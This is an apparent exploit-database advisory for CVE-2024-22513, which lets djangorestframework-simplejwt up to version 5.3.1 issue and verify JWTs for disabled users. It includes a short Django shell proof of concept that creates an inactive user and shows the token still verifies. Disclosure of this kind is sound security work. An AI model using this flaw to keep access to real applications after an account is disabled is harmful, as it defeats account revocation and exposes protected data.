Django REST Framework SimpleJWT 5.3.1 Information Disclosure

Risk: High
Local: No
Remote: Yes

# Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure # Date: 26/01/2024 # Exploit Author: Dhrumil Mistry (dmdhrumilmistry) # Vendor Homepage: # Software Link: # Version: <= 5.3.1 # Tested on: MacOS # CVE : CVE-2024-22513 # The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable. # This vulnerability has the potential to cause various security issues, # including Business Object Level Authorization (BOLA), Business Function # Level Authorization (BFLA), Information Disclosure, etc. The vulnerability # arises from the fact that a user can access web application resources even # after their account has been disabled, primarily due to the absence of proper # user validation checks. # If a programmer generates a JWT token for an inactive user using `AccessToken` # class and `for_user` method then a JWT token is returned which can be used for # authentication across the django and django rest framework application. # Start Django Shell using below command: # python shell # ---------------------------------------- # Create inactive user and generate token for the user from django.contrib.auth.models import User from rest_framework_simplejwt.tokens import AccessToken # create inactive user inactive_user_id = User.objects.create_user('testuser', '', 'testPassw0rd!', is_active=False).id # django application programmer generates token for the inactive user AccessToken.for_user(User.objects.get(id=inactive_user_id)) # error should be raised since user is inactive # django application verifying user token AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() # no exception is raised during verification of inactive user token

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